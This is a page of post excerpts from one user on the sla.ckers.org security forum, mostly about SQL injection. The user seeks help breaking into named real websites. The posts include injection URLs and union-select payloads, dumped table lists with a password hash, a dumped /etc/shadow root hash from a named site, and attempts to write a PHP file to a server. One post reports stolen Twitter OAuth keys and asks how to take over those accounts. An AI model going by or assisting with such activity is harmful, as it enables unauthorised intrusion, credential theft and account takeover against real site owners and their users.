Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 

Pages: 123Next
Current Page: 1 of 3
Results 1 - 30 of 81
1 year ago
RonPaul
Please message me if you can help me with a php script i am writing that has a lot of curl.
Forum: Projects
1 year ago
RonPaul
i can read files but i do not see a way to include code. how do you exploit this?
Forum: SQL and Code Injection
1 year ago
RonPaul
i need help.everything i try doesnot work http://ipacjinglecontest.com/vote.cfm?CS=665'
Forum: SQL and Code Injection
2 years ago
RonPaul
blind works db = t3_eera runns typo3 http://www.eera-ecer.de/typo3/index.php
Forum: SQL and Code Injection
2 years ago
RonPaul
i have a site i can see the users table i figured out that they are using some unique salt, because of the 20,000 people, there are no matching md5 hashes i tryed adding the userid before and after the plain text i have looked thru all tables but can not find any salt value i do not have read capabilities on files so i can not look at code how do you suggest i figure out the hash?
Forum: Full Disclosure
2 years ago
RonPaul
time based Current DB: "decN~? " there is a space after question mark
Forum: SQL and Code Injection
2 years ago
RonPaul
time based Current DB: landnet_3
Forum: SQL and Code Injection
2 years ago
RonPaul
sorry can not find nething
Forum: SQL and Code Injection
2 years ago
RonPaul
DB: martspace Tables: artist,artistconnect,artshop,banner,blueprint,brandcateg,brands,categ,categmain,company,data,data2,departure_connect,details,details2,events,eventsphotos,flash,hire,hotel_connect,hotel_photos,links,media,offers,pcoconnect,photoartists,photoartshop,photopress,press,products,spot,subcateg,users,video,work Columns: did,dname,dpass 0,martspace,8ca05b67278bf2b4e2ff1e9e65c
Forum: SQL and Code Injection
2 years ago
RonPaul
http://pastebin.mozilla.org/1650033
Forum: SQL and Code Injection
2 years ago
RonPaul
there are over 1k of these files. each one is similar, but the letters and numbers are unique.
Forum: Obfuscation
2 years ago
RonPaul
came across this code in a lot of files <?php
Forum: Obfuscation
2 years ago
RonPaul
i try /home/site/public_html/tmp/shdfg.php but Error Executing Database Query. Can't create/write to file '/home/site/public_html/tmp/testshdfg.php' (Errcode: 2) but i can write to the tmp of the system (just /tmp/testshdfg.php) and read it with load_file, to confirm it
Forum: SQL and Code Injection
2 years ago
RonPaul
im sorry, but i dont know what you mean
Forum: SQL and Code Injection
2 years ago
RonPaul
i can write to /tmp
Forum: SQL and Code Injection
2 years ago
RonPaul
i tied the php example on twitters page and it was asking me to sign in.
Forum: CSRF and Session Info
2 years ago
RonPaul
i need help finding a writeable directory, PM me if you can help.i am trying to keep this descrete
Forum: SQL and Code Injection
2 years ago
RonPaul
so i found a site that was storing 10 twitter usernames, consumer_key, consumer_secret, oauth_token and oauth_token_secret so i have all this information.... now what? cam i use it to get on there twitter accounts?
Forum: CSRF and Session Info
2 years ago
RonPaul
The site is running: php coldfusion java mysql cpanel cpanelhorde cpanelphpmyadmin cpanelphppgadmin cpanelroundcube -I then try: /usr/local/cpanel/base/3rdparty/phpMyAdmin/config.inc.php -I get config, but it just has blowfish key. -I try configs for phppgadmin and roundcube and I don't get nothing. -I know the full path, but can't read or write to it. -I can upload images,
Forum: SQL and Code Injection
2 years ago
RonPaul
So with my sql injection the only valuable information i found is the phpmyadmin config. but it doesnt contain any usr name or pws. all i have is the $cfg['blowfish_secret'] can i use this to login? i should clarify, it is running cpanel, and phpmyadmin is on top of that.
Forum: SQL and Code Injection
3 years ago
RonPaul
I get this error when I try to manipulate an id value. Is this sql injectable? Web Application Error Object Creation Error: example.webapp.WebAppException: Invalid ID Format: For input string
Forum: SQL and Code Injection
3 years ago
RonPaul
I can load the etc shadow, but cant seem to crack http://www.worldcall.net.pk/faq.php?id= root:$1$HtmpDVgW$sgbbvPXPb7i1McOIIOQiZ/:14719:0:99999:7::: bin:*:14673:0:99999:7::: daemon:*:14673:0:99999:7::: adm:*:14673:0:99999:7::: lp:*:14673:0:99999:7::: sync:*:14673:0:99999:7::: shutdown:*:14673:0:99999:7::: halt:*:14673:0:99999:7::: mail:*:14673:0:99999:7::: news:*:14673:0:99999:7::: u
Forum: SQL and Code Injection
3 years ago
RonPaul
i followed this: http://www.planetcreator.net/2010/01/mssql-injection-tutorial/ and i have tried adding not+in in various points of the injection without success
Forum: SQL and Code Injection
3 years ago
RonPaul
thank you for the help so far when i try getting another table convert(int,(select top 1 table_name from table_name where information_schema.tables not ('Posts'))) i get this Incorrect syntax near '('. when i try getting another column in the posts table convert(int,(select top 1 column_name from information_schema.columns where table_name = 'Posts' and column_name ('PostID')))– i g
Forum: SQL and Code Injection
3 years ago
RonPaul
Well that did something. Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4309.00 (X64) Aug 9 2010 14:49:09 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int. But I do not understand how to exploit from here
Forum: SQL and Code Injection
3 years ago
RonPaul
same error "The ntext data type cannot be selected as DISTINCT because it is not comparable. " lightos, can i pm you the link so you can take a look at it?
Forum: SQL and Code Injection
3 years ago
RonPaul
if it is union select null,null,null,null,null,null,null,null,null-- - and i change the 6th one to 6 i get:Operand type clash: ntext is incompatible with int all others get:The ntext data type cannot be selected as DISTINCT because it is not comparable. if i do union select 1,2,3,4,5,6,7,8,9-- - and change 6 to null i get: The ntext data type cannot be selected as DISTINCT becaus
Forum: SQL and Code Injection
3 years ago
RonPaul
I tried and received this: Server Error in '/' Application. The ntext data type cannot be selected as DISTINCT because it is not comparable. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Exception Details: System.Data.OleDb.OleDbException: Th
Forum: SQL and Code Injection
3 years ago
RonPaul
http://www.test.com/default.aspx?Tags=testaaa%27%20union%20select%201,2,3,4,5,6,7,8,9--%20- errors to Server Error in '/' Application. Operand type clash: ntext is incompatible with int Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Excepti
Forum: SQL and Code Injection
3 years ago
RonPaul
injection 1.php?userid=1&itemid=52' SELECT count(*) as cnt FROM inventory WHERE inv_userid = 1 AND inv_itemid = 52\' 1.php?userid=1&itemid=52 order by 1 produces a black page 1.php?userid=1&itemid=-52 union select 1 An error message is echoed from the script "Error!" container.php?userid=1'&itemid=52 Query was SELECT count(*) as cnt FROM inventory WHER
Forum: SQL and Code Injection
Pages: 123Next
Current Page: 1 of 3